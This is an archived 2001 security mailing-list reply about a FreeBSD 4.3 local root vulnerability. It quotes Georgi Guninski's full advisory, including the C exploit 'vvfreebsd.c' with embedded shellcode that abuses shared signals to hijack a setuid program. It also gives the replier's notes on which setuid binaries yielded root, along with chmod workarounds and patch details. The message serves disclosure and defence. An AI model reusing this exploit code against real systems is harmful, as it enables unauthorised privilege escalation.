Date: Wed, 11 Jul 2001 12:19:39 +0400 (MSD) From: Seva Gluschenko <gvs@rinet.ru> To: Bug Track <bugtraq@securityfocus.com> Cc: <security@freebsd.org> Subject: Re: FreeBSD 4.3 local root Message-ID: <20010711121224.J96652-100000@localhost> In-Reply-To: <3B4B0E7B.1492C76A@guninski.com>
next in thread | previous in thread | raw e-mail | index | archive | help
Message from Georgi Guninski at Jul 10 17:17 in parts: GG> Systems affected: GG> FreeBSD 4.3 and probably earlier versions. Confirmed for 3-STABLE GG> Exploit: GG> GG> Examine the source and don't send me mail if you get SEGV. well, actually, your native exploit doesn't work due to a little "mistake" inside ;) But, it was easy to correct %| Well, after a bunch of tests I've found only two suids which gave me suid shell: /usr/bin/passwd /usr/local/bin/ssh1 a lot of others, including login/rlogin, gave me either a nonsuid shell or just coredump (which is worse, of course). So, quick workaround should be chmod o-rx /usr/bin/passwd chmod u-s /usr/local/bin/ssh1 Of course, it does NOT save the system in general but can significantly decrease the first step risk. GG> http://www.guninski.com/vvfreebsd.c GG> GG> -------------vvfreebsd.c---------------------- GG> GG> /* GG> FreeBSD 4.3 local root exploit using shared signals. GG> Written by Georgi Guninski http://www.guninski.com GG> */ GG> GG> #include <stdio.h> GG> #include <signal.h> GG> #include <unistd.h> GG> int vv1; GG> GG> #define MYSIG SIGINT GG> GG> GG> //exec "/tmp/sh", shellcode gotten from the internet and modified GG> unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90" GG> "\x31\xc0\x50\x50\xb0\xb7\xcd\x80" GG> "\x31\xc0\x50\x50\xb0\x17\xcd\x80" GG> "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" GG> "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53" GG> "\xb0\x3b\x50\xcd\x80\x90\x90\x90"; GG> GG> typedef (*PROG)(); GG> extern char **environ; GG> GG> int main(int ac,char **av) GG> { GG> int pid; GG> //(*(PROG)bsdshell)(); GG> if(!(vv1=getenv("vv"))) GG> { GG> setenv("vv",bsdshell,1); GG> if(!execle(av[0],"vv",NULL,environ)) GG> { GG> perror("weird exec"); GG> exit(1); GG> } GG> } GG> GG> printf("vvfreebsd. Written by Georgi Guninski\n"); GG> printf("shall jump to %x\n",vv1); GG> GG> if(!(pid=rfork(RFPROC|RFSIGSHARE))) GG> { GG> printf("child=%d\n",getpid()); GG> // /usr/bin/login and rlogin work for me. ping gives nonsuid shell GG> // if(!execl("/usr/bin/rlogin","rlogin","localhost",0)) GG> if(!execl("/usr/bin/login","login",0)) GG> { GG> perror("exec setuid failed"); GG> exit(2); GG> }; GG> } GG> sleep(2); GG> signal(MYSIG,(sig_t)vv1); GG> sleep(2); GG> kill(pid,MYSIG); GG> printf("done\n"); GG> while(42); GG> } GG> GG> GG> GG> GG> ---------------------------------------------- GG> GG> Workaround/Soltution: GG> As far as I know patches for this problem are commited for both GG> -current and -stable. GG> >From "CVS log for src/sys/kern/kern_exec.c" GG> [MFC: do not share sigs after an exec] GG> The main diff seems to be at: GG> http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/kern/kern_exec.c.diff? GG> r1=1.107.2.7&r2=1.107.2.8&f=h GG> GG> Vendor status: GG> FreeBSD was informed on 2 July 2001 (sent them broken attachment on 1 GG> July). GG> GG> Some comparison of vendor response times from my personal experience: GG> FreeBSD seem to have fixed this in 7 days. GG> OpenBSD fixed my previous advisory in 6 days. GG> Microsoft are much slower. GG> GG> Regards, GG> Georgi Guninski GG> http://www.guninski.com GG> SY, Seva Gluschenko, just stranger on The Road. | http://gvs.rinet.ru/ Cronyx Plus / RiNet network administrator. | GVS-RIPE | GVS3-RIPN To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20010711121224.J96652-100000>